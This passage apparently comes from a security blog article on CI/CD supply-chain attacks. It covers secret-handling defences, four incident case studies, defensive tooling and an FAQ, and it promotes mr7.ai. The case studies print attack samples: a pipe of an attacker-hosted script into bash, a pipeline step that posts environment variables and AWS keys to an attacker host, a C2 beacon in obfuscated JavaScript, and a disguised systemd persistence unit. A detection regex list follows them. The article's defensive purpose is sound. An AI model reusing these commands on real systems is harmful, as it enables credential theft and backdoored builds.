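For the side-channel row in particular, the usual mitigation for comparison timing leaks is a constant-time comparison. A minimal sketch using the standard library's `hmac.compare_digest` follows; the wrapper name `constant_time_equal` is hypothetical.

```python
import hmac


def constant_time_equal(secret: str, guess: str) -> bool:
    """Compare two strings without exiting early at the first mismatching character."""
    return hmac.compare_digest(secret.encode("utf-8"), guess.encode("utf-8"))


print(constant_time_equal("SECRET_VALUE", "SECRET_VALUE"))
print(constant_time_equal("SECRET_VALUE", "SECRET_VALUF"))
```

This removes the per-character timing signal, although the length of the inputs may still be observable. Comparing fixed-length digests of both values is one way to avoid that.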

Defensive strategies should include:

- Principle of Least Privilege: Grant minimal necessary permissions to pipeline jobs

- Secret Rotation: Regularly rotate credentials with short expiration periods

- Secure Transmission: Always encrypt secrets in transit and at rest

- Memory Management: Clear sensitive data from memory after use

- Audit Logging: Monitor and log all secret access attempts

- Dynamic Provisioning: Generate temporary credentials for each pipeline run
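Because several of the extraction methods above depend on secrets leaking into build output, one complementary control is to redact known secret values before a log line is stored. The sketch below assumes the job has access to the list of secret values it was given; the function name `redact` and the mask string are illustrative choices.

```python
def redact(line, secrets, mask="***"):
    """Replace every known secret value in a log line with a mask."""
    # Longest first, so a secret that contains another secret is masked whole.
    for secret in sorted(secrets, key=len, reverse=True):
        if secret:  # skip empty values, which would otherwise match everywhere
            line = line.replace(secret, mask)
    return line


known_secrets = ["abc123", "abc123xyz"]
print(redact("token=abc123 key=abc123xyz", known_secrets))
```

Exact-match redaction does not catch encoded or partially printed secrets, such as a base64 copy or the last four characters, so it reduces accidental exposure rather than stopping a deliberate exfiltration step.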

Advanced protection mechanisms include keeping secrets encrypted whenever they are not in active use:

```python
# Example of secure secret handling
import os
import tempfile
from cryptography.fernet import Fernet

class SecureSecretHandler:
    def __init__(self):
        self.key = Fernet.generate_key()
        self.cipher_suite = Fernet(self.key)

    def store_secret(self, secret_value):
        # Encrypt secret before storing
        encrypted_secret = self.cipher_suite.encrypt(secret_value.encode())
        # Store in secure temporary file
        with tempfile.NamedTemporaryFile(mode='wb', delete=False) as f:
            f.write(encrypted_secret)
            return f.name

    def retrieve_secret(self, file_path):
        # Read and decrypt secret
        with open(file_path, 'rb') as f:
            encrypted_secret = f.read()
        decrypted_secret = self.cipher_suite.decrypt(encrypted_secret)
        # Delete the temporary file once it has been read
        os.unlink(file_path)
        return decrypted_secret.decode()

    def clear_memory(self):
        # Drop references to the key material (this does not overwrite memory)
        self.key = None
        self.cipher_suite = None
```

Key Insight: CI/CD pipelines concentrate highly valuable secrets, making them prime targets for extraction through various technical and social engineering techniques that require comprehensive protection strategies.

What Real-World Examples Demonstrate CI/CD Supply Chain Attacks?

Real-world incidents provide crucial insights into the evolving tactics, techniques, and procedures (TTPs) employed by adversaries targeting CI/CD pipelines. Several high-profile cases from 2025 and early 2026 demonstrate the sophistication and impact potential of these attacks, serving as case studies for both defenders and researchers.

The CodeCraft Breach (January 2026)

One of the most significant recent incidents involved CodeCraft Industries, a major software development company whose CI/CD infrastructure was compromised through a sophisticated runner hijacking campaign. Attackers gained initial access through a phishing campaign targeting DevOps engineers, then pivoted to compromise self-hosted GitHub runners used for building enterprise software products.

The attack chain began with credential harvesting through a fake VPN portal that captured authentication tokens used for accessing CI/CD systems. Once inside, attackers identified runners with persistent network connections to production environments and installed rootkits that survived routine maintenance cycles.

```bash
# Timeline of CodeCraft breach
# January 15, 2026: Initial phishing success
# January 17, 2026: Runner compromise via SSH key theft
# January 20, 2026: Persistence established through systemd service
sudo tee /etc/systemd/system/build-monitor.service << EOF
[Unit]
Description=Build Process Monitor
After=network.target

[Service]
Type=simple
User=root
ExecStart=/usr/local/bin/build-monitor.sh
Restart=always

[Install]
WantedBy=multi-user.target
EOF

# January 25, 2026: Artifact poisoning begins
# February 1, 2026: First customer reports of backdoored software
```

The impact was severe, affecting approximately 2,500 enterprise customers who unknowingly deployed compromised versions of CodeCraft's flagship product suite. The backdoor enabled remote access to customer networks and facilitated data exfiltration totaling over 15TB of sensitive information.

The OpenBuild Repository Compromise (March 2026)

OpenBuild, a popular open-source project hosting platform, fell victim to an environment variable manipulation attack that affected hundreds of dependent projects. Attackers exploited a vulnerability in the platform's webhook handling system to inject malicious environment variables into build processes.

The compromise leveraged a feature that allowed project maintainers to specify custom environment variables for build jobs. Attackers submitted pull requests that included malicious webhook configurations:

```yaml
# Malicious webhook payload used in OpenBuild compromise
{
  "ref": "refs/heads/main",
  "repository": {
    "name": "popular-library"
  },
  "commits": [{
    "message": "Fix build issues",
    "added": [],
    "removed": [],
    "modified": ["Dockerfile"]
  }],
  "custom_variables": {
    "BUILD_SCRIPT": "curl -s http://malicious-cdn.com/injector.sh | bash",
    "NODE_OPTIONS": "--require /tmp/malware.js"
  }
}
```

This resulted in the automatic execution of malicious code during the build process for hundreds of projects that used OpenBuild's automated testing features. The attack remained undetected for over two weeks, during which time compromised builds were distributed to unsuspecting developers.
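One way to blunt this class of attack is to validate user-supplied build variables before they reach a build job. The sketch below assumes a platform that receives `custom_variables` as a dictionary of strings; the `ALLOWED_NAMES` allowlist and the `validate_custom_variables` function are hypothetical and are not part of any real OpenBuild API.

```python
import re

# Hypothetical allowlist of variable names a project may set for its builds.
ALLOWED_NAMES = {"BUILD_TARGET", "LOG_LEVEL", "NODE_ENV"}
# Characters that enable shell command chaining, substitution, or redirection.
SHELL_METACHARS = re.compile(r"[;&|`$<>\\\n]")


def validate_custom_variables(variables: dict) -> dict:
    """Return the variables unchanged, or raise ValueError on the first rejected entry."""
    for name, value in variables.items():
        if name not in ALLOWED_NAMES:
            raise ValueError(f"variable not allowlisted: {name}")
        if SHELL_METACHARS.search(value):
            raise ValueError(f"shell metacharacters in value of {name}")
    return variables
```

An allowlist is used here instead of a blocklist because interpreter-level variables such as `NODE_OPTIONS` change program behavior without containing any suspicious characters, so value filtering alone would not catch them.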

The CloudDeploy API Key Harvesting Incident (February 2026)

CloudDeploy, a cloud infrastructure provider, experienced a significant breach when attackers extracted API keys from their internal CI/CD pipeline. The compromise began with social engineering targeting junior developers who were granted excessive permissions to troubleshoot pipeline issues.

Attackers used the stolen credentials to modify pipeline configurations and add steps designed to capture and exfiltrate secrets:

```yaml
# Modified pipeline configuration used in CloudDeploy breach
name: Production Deploy
on: [deployment]
jobs:
  deploy:
    runs-on: [self-hosted, linux, x64]
    steps:
      # Legitimate deployment steps...

      # Malicious step added by attackers
      - name: Backup Configuration
        run: |
          # Exfiltrate all environment variables
          printenv > /tmp/env_backup.txt
          curl -X POST -F "data=@/tmp/env_backup.txt" https://attacker-collector.com/upload
          # Extract and send specific secrets
          echo "AWS Keys: $AWS_ACCESS_KEY_ID/$AWS_SECRET_ACCESS_KEY" | \
            curl -X POST --data-binary @- https://attacker-collector.com/aws-keys
          # Clean up evidence
          rm /tmp/env_backup.txt
```

The incident resulted in unauthorized access to over 500 customer cloud environments, with attackers leveraging the stolen credentials to provision new resources and mine cryptocurrency. Total financial impact exceeded $12 million in direct losses and remediation costs.
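Pipeline changes like the injected step in this incident can sometimes be caught in review by a simple static check on workflow files. The following sketch scans workflow text line by line for a few exfiltration-style shell idioms. The pattern set and the `scan_workflow` name are illustrative assumptions, and a determined attacker could evade regular expressions this simple.

```python
import re

# Heuristic patterns; a real rule set would need tuning per organization.
SUSPICIOUS_PATTERNS = {
    "environment dump": re.compile(r"\b(printenv|env)\b\s*(>|\|)"),
    "secret echoed into a pipe": re.compile(
        r"echo\s+.*\$\{?[A-Z_]*(SECRET|TOKEN|KEY)[A-Z_]*\}?.*\|"
    ),
    "file upload via curl": re.compile(r"curl\b.*(-F|--data-binary|--upload-file)\s"),
}


def scan_workflow(text: str) -> list:
    """Return (line_number, finding) pairs for lines matching a suspicious pattern."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                findings.append((number, label))
    return findings
```

A check of this kind fits best as a required status check on pull requests that touch workflow definitions, so a flagged change needs explicit human approval before it can run on a privileged runner.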

The SecurePipe Dependency Poisoning Campaign (April 2026)

SecurePipe, a security-focused software company, became the target of a sophisticated artifact poisoning campaign that demonstrated the evolution of supply chain attacks. Rather than directly compromising SecurePipe's infrastructure, attackers focused on poisoning dependencies used in their build process.

The attack involved creating malicious versions of commonly used open-source libraries and submitting them to package repositories under slightly different names. Automated dependency resolution in SecurePipe's pipeline pulled in these compromised packages:

```json
{
  "dependencies": {
    "lodash": "^4.17.21",
    "express": "^4.18.2",
    "lodash-utils": "1.0.3"
  }
}
```

Here `lodash-utils` is the malicious package mimicking lodash.

Analysis revealed that the malicious packages contained obfuscated code that activated during the build process:

```javascript
// Obfuscated malicious code found in compromised package
(function() {
  var _0x1234 = ['exec', 'child_process', 'http', 'get'];
  (function(_0x5678, _0x9abc) {
    // Deobfuscation logic
    var _0xdef0 = function(_0x1357) {
      return _0x5678[_0x1357];
    };

    // Malicious payload execution
    if (process.env.NODE_ENV === 'production') {
      require(_0xdef0(0x1))[_0xdef0(0x0)]('curl http://c2-server.com/beacon');
    }
  }(['exec', 'child_process'], 0x135));
})();
```

The campaign affected dozens of SecurePipe's customers who unknowingly included the backdoored software in their own applications. Detection was complicated by the legitimate appearance of the compromised dependencies and the sophisticated obfuscation techniques used to hide malicious functionality.
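Lookalike names such as `lodash-utils` can be flagged before installation by comparing each declared dependency against a list of packages the organization already trusts. The sketch below is one possible heuristic, not a description of how SecurePipe or any registry detects typosquatting. `TRUSTED_PACKAGES`, the affix rule, and the edit-distance threshold of 2 are all assumptions chosen for illustration.

```python
from typing import Optional

# Hypothetical list of packages the organization already trusts.
TRUSTED_PACKAGES = {"lodash", "express", "react"}


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance computed with a rolling one-row table."""
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            cost = 0 if char_a == char_b else 1
            current.append(
                min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + cost)
            )
        previous = current
    return previous[-1]


def lookalike_of(name: str) -> Optional[str]:
    """Return the trusted package that `name` appears to imitate, or None."""
    if name in TRUSTED_PACKAGES:
        return None
    for trusted in sorted(TRUSTED_PACKAGES):
        # Affix pattern such as "lodash-utils" or "express_helper".
        if name.startswith((trusted + "-", trusted + "_", trusted + ".")):
            return trusted
        # Near-miss spelling such as "expres".
        if edit_distance(name, trusted) <= 2:
            return trusted
    return None
```

Both rules produce false positives, since plenty of legitimate packages share a prefix with or sit one character away from a popular name. A match is therefore better used to hold a dependency for manual review than to block it outright.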

These incidents highlight several critical lessons:

- Trust Assumptions: Organizations must critically evaluate trust relationships within their CI/CD ecosystems

- Monitoring Gaps: Traditional security controls often fail to detect pipeline-specific attack vectors

- Impact Amplification: Compromised pipelines can affect vast numbers of downstream consumers

- Persistence Challenges: Rootkits and backdoors in build environments can survive standard remediation efforts

- Detection Complexity: Sophisticated obfuscation makes identification of malicious artifacts extremely difficult

Key Insight: Real-world CI/CD supply chain attacks demonstrate increasing sophistication and impact, requiring organizations to adopt proactive defense strategies based on actual threat intelligence rather than theoretical models.

What Defensive Strategies Protect Against CI/CD Supply Chain Attacks?

Protecting against CI/CD supply chain attacks requires a comprehensive, multi-layered defense strategy that addresses the unique characteristics of pipeline environments. Effective protection involves combining technical controls, process improvements, and continuous monitoring to create resilient defenses against sophisticated adversaries.

Zero Trust Architecture Implementation

Implementing zero trust principles within CI/CD environments fundamentally changes how organizations approach pipeline security. Rather than assuming trust based on network location or previous authentication, every interaction is verified and validated:

```yaml
# Zero trust pipeline configuration example
name: Zero Trust Build
on: [push]
jobs:
  build:
    # Isolated runner with minimal privileges
    runs-on: [self-hosted, isolated]

    # Dynamic credential provisioning
    env:
      TEMP_AWS_ACCESS_KEY_ID: ${{ secrets.TEMP_CREDS_ACCESS_KEY }}
      TEMP_AWS_SECRET_ACCESS_KEY: ${{ secrets.TEMP_CREDS_SECRET_KEY }}
      # Assumed secret name; the Vault token must be supplied to the job
      VAULT_TOKEN: ${{ secrets.VAULT_TOKEN }}
    steps:
      - name: Check out source
        uses: actions/checkout@v4

      - name: Provision temporary credentials
        run: |
          # Request just-in-time credentials from vault
          TEMP_CREDS=$(curl -s -H "Authorization: Bearer $VAULT_TOKEN" \
            https://vault.internal/v1/aws/creds/build-role)
          AWS_ACCESS_KEY_ID=$(echo "$TEMP_CREDS" | jq -r '.data.access_key')
          AWS_SECRET_ACCESS_KEY=$(echo "$TEMP_CREDS" | jq -r '.data.secret_key')
          # Mask the values before they can appear in any log output
          echo "::add-mask::$AWS_ACCESS_KEY_ID"
          echo "::add-mask::$AWS_SECRET_ACCESS_KEY"
          # Credentials automatically expire after 1 hour. Exported shell
          # variables do not survive the step, so pass them via GITHUB_ENV.
          {
            echo "AWS_ACCESS_KEY_ID=$AWS_ACCESS_KEY_ID"
            echo "AWS_SECRET_ACCESS_KEY=$AWS_SECRET_ACCESS_KEY"
            echo "VAULT_LEASE_ID=$(echo "$TEMP_CREDS" | jq -r '.lease_id')"
          } >> "$GITHUB_ENV"

      - name: Build application
        run: |
          # Build with restricted network access
          docker build --network none -t app:${{ github.sha }} .

      - name: Security scanning
        run: |
          # Static analysis with multiple engines
          trivy image app:${{ github.sha }}
          snyk container test app:${{ github.sha }} --file=Dockerfile

      - name: Revoke credentials
        if: always()
        run: |
          # Cleanup: revoke the lease issued in the provisioning step
          curl -s -X POST -H "Authorization: Bearer $VAULT_TOKEN" \
            -d "{\"lease_id\": \"$VAULT_LEASE_ID\"}" \
            https://vault.internal/v1/sys/leases/revoke
```

Pipeline Integrity Verification

Ensuring pipeline integrity requires implementing cryptographic verification of all components, from source code to final artifacts. This involves establishing trust chains that can detect unauthorized modifications:

```python
# Pipeline integrity verification system
import hashlib
import json

from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding


class PipelineIntegrityVerifier:
    def __init__(self, public_key_pem):
        # public_key_pem is the PEM-encoded RSA public key as bytes
        self.public_key = serialization.load_pem_public_key(public_key_pem)

    def calculate_artifact_hash(self, file_path):
        """Calculate SHA-256 hash of build artifact"""
        sha256_hash = hashlib.sha256()
        with open(file_path, "rb") as f:
            for byte_block in iter(lambda: f.read(4096), b""):
                sha256_hash.update(byte_block)
        return sha256_hash.hexdigest()

    def verify_signature(self, artifact_path, signature_path):
        """Verify artifact signature using public key"""
        with open(artifact_path, 'rb') as f:
            artifact_data = f.read()
        with open(signature_path, 'rb') as f:
            signature = f.read()
        try:
            self.public_key.verify(
                signature,
                artifact_data,
                padding.PSS(
                    mgf=padding.MGF1(hashes.SHA256()),
                    salt_length=padding.PSS.MAX_LENGTH
                ),
                hashes.SHA256()
            )
            return True
        except Exception as e:
            print(f"Signature verification failed: {e}")
            return False

    def generate_build_manifest(self, build_info):
        """Create a manifest of the build process and its SHA-256 digest.

        The digest is what a separate signing step would sign.
        """
        manifest = {
            'timestamp': build_info['timestamp'],
            'commit_hash': build_info['commit_hash'],
            'artifacts': build_info['artifacts'],
            'runner_info': build_info['runner_info']
        }
        manifest_json = json.dumps(manifest, sort_keys=True)
        manifest_hash = hashlib.sha256(manifest_json.encode()).hexdigest()
        return manifest_hash, manifest_json
```

Behavioral Anomaly Detection

Implementing machine learning-based anomaly detection can identify suspicious activities that might indicate pipeline compromise. This approach monitors for deviations from established baselines:

```python
# Behavioral anomaly detection for CI/CD pipelines
import numpy as np
from sklearn.ensemble import IsolationForest
from sklearn.preprocessing import StandardScaler


class PipelineAnomalyDetector:
    def __init__(self):
        self.model = IsolationForest(contamination=0.1, random_state=42)
        self.scaler = StandardScaler()
        self.baseline_data = None

    def collect_baseline_metrics(self, pipeline_runs):
        """Collect baseline metrics from normal pipeline operations"""
        metrics = []
        for run in pipeline_runs:
            metric_vector = [
                run.duration_seconds,
                run.network_bytes_out,
                run.files_modified_count,
                run.external_api_calls,
                run.docker_layers_built,
                run.memory_peak_mb
            ]
            metrics.append(metric_vector)
        self.baseline_data = np.array(metrics)
        scaled_data = self.scaler.fit_transform(self.baseline_data)
        self.model.fit(scaled_data)

    def detect_anomalies(self, new_run):
        """Detect anomalies in new pipeline run"""
        if self.baseline_data is None:
            raise ValueError("Baseline data not established")
        new_metrics = np.array([[
            new_run.duration_seconds,
            new_run.network_bytes_out,
            new_run.files_modified_count,
            new_run.external_api_calls,
            new_run.docker_layers_built,
            new_run.memory_peak_mb
        ]])
        scaled_new = self.scaler.transform(new_metrics)
        # Lower decision_function scores are more anomalous; predict() returns -1 for outliers
        anomaly_score = self.model.decision_function(scaled_new)[0]
        is_anomaly = self.model.predict(scaled_new)[0] == -1
        return is_anomaly, anomaly_score

    def generate_alert(self, run_id, score):
        """Generate detailed alert for anomalous pipeline run"""
        alert_details = {
            'run_id': run_id,
            'anomaly_score': score,
            'severity': 'HIGH' if score < -0.5 else 'MEDIUM',
            'recommendations': [
                'Review pipeline logs for unusual activities',
                'Verify artifact integrity',
                'Check for unauthorized credential usage',
                'Inspect runner for persistence mechanisms'
            ]
        }
        return alert_details
```

Secure Pipeline Configuration Management

Proper configuration management ensures that pipeline definitions themselves cannot be easily compromised. This involves implementing secure defaults and preventing unauthorized modifications:

```hcl
# Terraform configuration for secure CI/CD infrastructure
resource "github_repository" "secure_project" {
  name = "secure-project"

  # Enforce linear history
  allow_merge_commit = false
  allow_squash_merge = true
  allow_rebase_merge = true
}

# Status checks and review rules are branch protection settings,
# so they belong on github_branch_protection, not on the repository
resource "github_branch_protection" "main" {
  repository_id = github_repository.secure_project.node_id
  pattern       = "main"

  # Enable required status checks
  required_status_checks {
    strict = true
    contexts = [
      "security/scanning",
      "integrity/verification",
      "compliance/check"
    ]
  }

  # Restrict branch modifications
  required_pull_request_reviews {
    dismiss_stale_reviews           = true
    require_code_owner_reviews      = true
    required_approving_review_count = 2
  }

  # Prevent force pushes
  allows_force_pushes = false

  # Require signed commits
  require_signed_commits = true

  # Enforce admin restrictions
  enforce_admins = true
}
```
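Declared configuration can drift from what is actually enforced, so it can help to audit the live branch protection settings as well. The sketch below checks a settings dictionary for the same controls. The key names follow the shape of GitHub's REST branch protection response as best understood here and should be verified against the current API documentation. `audit_branch_protection` is a hypothetical helper and makes no network calls itself.

```python
def audit_branch_protection(protection: dict) -> list:
    """Return policy gaps found in a branch-protection settings dictionary."""
    gaps = []

    def enabled(key: str) -> bool:
        # Toggle-style settings are assumed to look like {"enabled": true}.
        return bool((protection.get(key) or {}).get("enabled", False))

    reviews = protection.get("required_pull_request_reviews") or {}
    if reviews.get("required_approving_review_count", 0) < 2:
        gaps.append("fewer than 2 approving reviews required")
    if not reviews.get("require_code_owner_reviews", False):
        gaps.append("code owner review not required")
    checks = protection.get("required_status_checks") or {}
    if not checks.get("strict", False):
        gaps.append("status checks not strict")
    if not enabled("enforce_admins"):
        gaps.append("admins can bypass protection")
    if not enabled("required_signatures"):
        gaps.append("signed commits not required")
    if enabled("allow_force_pushes"):
        gaps.append("force pushes allowed")
    return gaps
```

An empty list means the dictionary satisfies every rule in this sketch. Any other result names the specific control that is missing, which makes the output easy to route into an alert.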

Comprehensive Monitoring and Alerting

Effective monitoring requires collecting and analyzing multiple data sources to detect potential compromises. This includes logs, metrics, and behavioral data from all pipeline components:

```yaml
# Comprehensive monitoring configuration
name: Enhanced Monitoring
on:
  workflow_run:
    # workflow_run needs the list of workflows to watch; this name is a placeholder
    workflows: ["Production Deploy"]
    types: [completed]
jobs:
  monitor:
    runs-on: ubuntu-latest
    steps:
      - name: Collect pipeline telemetry
        run: |
          # System metrics collection
          echo "CPU Usage: $(top -bn1 | grep "Cpu(s)" | awk '{print $2}' | cut -d'%' -f1)" >> metrics.log
          echo "Memory Usage: $(free | grep Mem | awk '{printf("%.2f%%", $3/$2 * 100.0)}')" >> metrics.log
          echo "Disk Usage: $(df -h / | awk 'NR==2{print $5}')" >> metrics.log

          # Network activity monitoring
          netstat -an | grep ESTABLISHED | wc -l >> network_connections.log

          # File system changes
          find /tmp -type f -newer /tmp/reference_file 2>/dev/null | wc -l >> file_changes.log

      - name: Send telemetry to monitoring system
        run: |
          # Send collected metrics to centralized monitoring.
          # Each value is read from its own labeled line in metrics.log.
          jq -n \
            --arg cpu "$(grep '^CPU Usage' metrics.log | tail -1 | cut -d' ' -f3)" \
            --arg mem "$(grep '^Memory Usage' metrics.log | tail -1 | cut -d' ' -f3)" \
            '{cpu_usage: $cpu, memory_usage: $mem, timestamp: now}' |
            curl -X POST https://monitoring.example.com/api/v1/metrics \
              -H "Content-Type: application/json" \
              -d @-
```

Emergency Response Procedures

Establishing clear incident response procedures specifically for CI/CD compromises ensures rapid containment and recovery:

```bash
#!/bin/bash

# CI/CD Incident Response Script

function isolate_compromised_pipeline() {
    echo "[$(date)] Initiating pipeline isolation..."

    # Disable every workflow in the repository (gh has no "all" shortcut)
    for workflow in $(gh api "repos/$COMPROMISED_REPO/actions/workflows" --jq '.workflows[].id'); do
        gh workflow disable "$workflow" --repo "$COMPROMISED_REPO"
    done

    # Revoke all pipeline secrets
    for secret in $(gh secret list --repo "$COMPROMISED_REPO" | awk '{print $1}'); do
        gh secret delete "$secret" --repo "$COMPROMISED_REPO"
    done

    # Quarantine affected runners
    for runner in $(gh api "repos/$COMPROMISED_REPO/actions/runners" | jq -r '.runners[].id'); do
        gh api -X DELETE "repos/$COMPROMISED_REPO/actions/runners/$runner"
    done

    echo "[$(date)] Pipeline isolation completed."
}

function investigate_compromise() {
    echo "[$(date)] Starting forensic investigation..."

    # Collect pipeline execution logs
    gh run list --repo "$COMPROMISED_REPO" --limit 100 > pipeline_runs.log

    # Analyze artifact signatures
    find ./artifacts -name "*.sig" | while read -r artifact; do
        openssl dgst -sha256 -verify public_key.pem -signature "$artifact" "${artifact%.sig}"
    done

    # Check for unauthorized network connections (capture keeps running in the background)
    tcpdump -i any -w forensic_capture.pcap host "$SUSPICIOUS_IP" &

    echo "[$(date)] Forensic collection completed."
}

# Execute response procedures
isolate_compromised_pipeline
investigate_compromise
```

Defense-in-depth strategies should also include:

- Regular Security Assessments: Conduct periodic penetration testing of CI/CD infrastructure

- Supply Chain Risk Management: Implement vendor security requirements and monitoring

- Developer Education: Train teams on secure pipeline practices and threat awareness

- Incident Simulation: Regularly test response procedures through controlled exercises

- Third-Party Tooling: Leverage specialized security tools designed for pipeline environments

Organizations can enhance their defensive posture by integrating AI-powered security tools like those available through mr7.ai. These tools can automate many aspects of detection and response and can surface subtle indicators that human analysts might miss.

Key Insight: Effective defense against CI/CD supply chain attacks requires implementing zero trust principles, comprehensive monitoring, and rapid incident response capabilities while maintaining usability for development teams.

Key Takeaways

• CI/CD supply chain attacks exploit the inherent trust in automated build and deployment processes, making them particularly dangerous due to their stealth and potential for widespread impact

• Living Off The Pipeline (LOTP) techniques include runner hijacking, artifact poisoning, environment variable manipulation, and secret extraction, each requiring specific defensive strategies

• Real-world incidents demonstrate that these attacks can result in massive data breaches, unauthorized access to production environments, and distribution of backdoored software to countless downstream consumers

• Zero trust architecture implementation within CI/CD environments significantly reduces attack surface by eliminating implicit trust assumptions and enforcing continuous verification

• Comprehensive monitoring and behavioral anomaly detection are essential for identifying sophisticated attacks that might otherwise go unnoticed in legitimate pipeline traffic

• Emergency response procedures must be specifically tailored for CI/CD compromises, including rapid isolation capabilities and forensic collection processes

• AI-powered security tools like mr7.ai can automate detection and response while providing advanced analytical capabilities for identifying subtle attack indicators

Frequently Asked Questions

Q: What makes CI/CD pipelines attractive targets for attackers?

CI/CD pipelines are attractive targets because they operate with high privileges necessary for deployment operations, have access to sensitive credentials and production environments, and are often trusted implicitly by development teams. Compromising a pipeline allows attackers to affect every application built through that infrastructure, amplifying their impact significantly.

Q: How can organizations detect compromised CI/CD runners?

Organizations can detect compromised runners through behavioral monitoring, anomaly detection systems, regular reimaging schedules, and network traffic analysis. Key indicators include unusual outbound connections, unexpected file modifications, abnormal resource utilization patterns, and unauthorized process executions during build times.
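As a simple illustration of the "unusual outbound connections" indicator, a run's outbound traffic can be compared against the history of earlier runs. The sketch below uses a plain standard score in place of a trained model. The function names, the byte counts fed to them, and the threshold of 3 deviations are assumptions made for the example.

```python
import math
import statistics


def outbound_zscore(baseline_bytes: list, observed_bytes: float) -> float:
    """Standard score of one run's outbound traffic against historical runs."""
    mean = statistics.fmean(baseline_bytes)
    spread = statistics.stdev(baseline_bytes)  # needs at least two samples
    if spread == 0:
        if observed_bytes == mean:
            return 0.0
        # Any deviation from a perfectly constant baseline is unbounded.
        return math.copysign(math.inf, observed_bytes - mean)
    return (observed_bytes - mean) / spread


def is_suspicious(baseline_bytes: list, observed_bytes: float,
                  threshold: float = 3.0) -> bool:
    """Flag runs whose outbound traffic is far above the historical mean."""
    return outbound_zscore(baseline_bytes, observed_bytes) > threshold
```

Only the upper tail is flagged because exfiltration shows up as extra outbound traffic. A single-metric check like this is easy to reason about but will miss slow or low-volume leaks, which is where multi-feature approaches become useful.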

Q: What are the most effective defenses against artifact poisoning?

The most effective defenses against artifact poisoning include implementing reproducible builds, cryptographic signing of all artifacts, multi-stage verification processes, runtime behavior monitoring, and regular integrity checks. Organizations should also maintain clean build environments and verify dependencies against trusted sources.
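A regular integrity check can be as small as comparing each artifact's SHA-256 digest with the value recorded at build time. The sketch below assumes a manifest that maps relative file paths to hex digests and that was itself obtained from a trusted, signed source. `verify_against_manifest` and the manifest layout are hypothetical, not a standard format.

```python
import hashlib
import hmac
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_against_manifest(root: Path, manifest: dict) -> list:
    """Return relative paths whose file is missing or whose digest differs."""
    mismatches = []
    for relative_path, expected in manifest.items():
        candidate = root / relative_path
        if not candidate.is_file():
            mismatches.append(relative_path)
            continue
        # compare_digest performs a constant-time comparison.
        if not hmac.compare_digest(sha256_of(candidate), expected.lower()):
            mismatches.append(relative_path)
    return mismatches
```

The check is only as trustworthy as the manifest. If an attacker who controls the pipeline can also rewrite the manifest, the digests will match the poisoned artifacts, which is why the manifest itself needs a signature verified with a key held outside the build environment.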

Q: How do environment variable manipulation attacks work in practice?

Environment variable manipulation attacks work by exploiting weak input validation in pipeline configurations, injecting malicious values through webhook payloads, or overriding expected variables with attacker-controlled values. These attacks can lead to command injection, privilege escalation, and redirection of deployment activities to malicious targets.

Q: What immediate steps should organizations take when suspecting a CI/CD compromise?

When suspecting a CI/CD compromise, organizations should immediately isolate affected pipelines, revoke all associated credentials, quarantine compromised runners, collect forensic evidence, and begin investigating the scope of the breach. It's also crucial to notify stakeholders and prepare for potential incident disclosure requirements.
